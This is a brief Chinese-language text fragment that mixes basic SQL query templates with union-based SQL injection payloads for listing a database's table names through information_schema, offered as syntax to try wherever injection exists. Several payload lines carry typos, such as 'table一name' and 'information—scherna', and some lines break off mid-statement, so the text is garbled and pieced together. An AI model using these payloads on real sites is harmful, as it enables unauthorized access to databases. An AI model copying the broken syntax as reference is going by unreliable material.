SQL 基本语句使用方法 sql="select * from 数据表 where 字段名=字段值 order by 字段名 [desc]" sql="select * from 数据表 where 字段名 like '%字段值%' order by 字段名 [desc]" sql="select top 10 * from 数据表 where 字段名 order by 字段名 [desc]" sql="select * from 数据表 where 字段名 in ('值1','值2','值3
基本的sql注入语法,大部分存在sql注入都可以使用以上代码来尝试
查询表名
and 1=2 union select 1,table一name from information—scherna.tables where table_schema=database() limit 1,1
and 1=2 union select 1,(select group_concat(table_name) from information.schema.tables where table_schem